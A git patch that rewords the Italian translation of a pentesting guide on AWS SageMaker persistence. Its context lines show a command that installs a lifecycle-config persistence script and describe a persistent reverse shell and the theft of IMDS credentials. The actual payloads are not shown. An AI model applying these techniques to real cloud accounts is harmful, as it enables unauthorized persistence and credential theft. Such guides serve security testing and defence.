From bc505d1864a99593d4c6d091b83ac159ca0c7daf Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 22 Jul 2025 19:00:53 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-sagem --- .../aws-persistence/aws-sagemaker-persistence.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md index e64042137..37b9f352a 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md @@ -101,13 +101,13 @@ aws sagemaker create-studio-lifecycle-config \ --studio-lifecycle-config-content $(base64 -w0 editor_persist.sh) ``` ### Informazioni Critiche: -* Allegare LCC a livello di dominio o spazio influisce su tutti gli utenti o le applicazioni nel campo di applicazione. -* Richiede permessi più elevati (sagemaker:UpdateDomain, sagemaker:UpdateSpace) tipicamente più fattibili a livello di spazio che a livello di dominio. +* Allegare LCC a livello di dominio o spazio influisce su tutti gli utenti o applicazioni nell'ambito. +* Richiede permessi più elevati (sagemaker:UpdateDomain, sagemaker:UpdateSpace) tipicamente più fattibili a livello di spazio che di dominio. * I controlli a livello di rete (ad es., filtraggio egress rigoroso) possono prevenire shell inverse o esfiltrazione di dati riuscite. ## Shell Inversa tramite Configurazione del Ciclo di Vita -Le Configurazioni del Ciclo di Vita di SageMaker (LCC) eseguono script personalizzati quando le istanze del notebook vengono avviate. Un attaccante con permessi può stabilire una shell inversa persistente. +Le Configurazioni del Ciclo di Vita di SageMaker (LCC) eseguono script personalizzati quando le istanze del notebook si avviano. Un attaccante con permessi può stabilire una shell inversa persistente. ### Esempio di Payload: ``` @@ -135,7 +135,7 @@ chmod +x $PAYLOAD_PATH ``` ## Esfiltrazione delle Credenziali tramite IMDS (v1 & v2) -Le configurazioni del ciclo di vita possono interrogare il servizio di metadati dell'istanza (IMDS) per recuperare le credenziali IAM ed esfiltrarle in una posizione controllata dall'attaccante. +Le configurazioni del ciclo di vita possono interrogare il Servizio di Metadati dell'Istanza (IMDS) per recuperare le credenziali IAM ed esfiltrarle in una posizione controllata dall'attaccante. ### Esempio di Payload: ```bash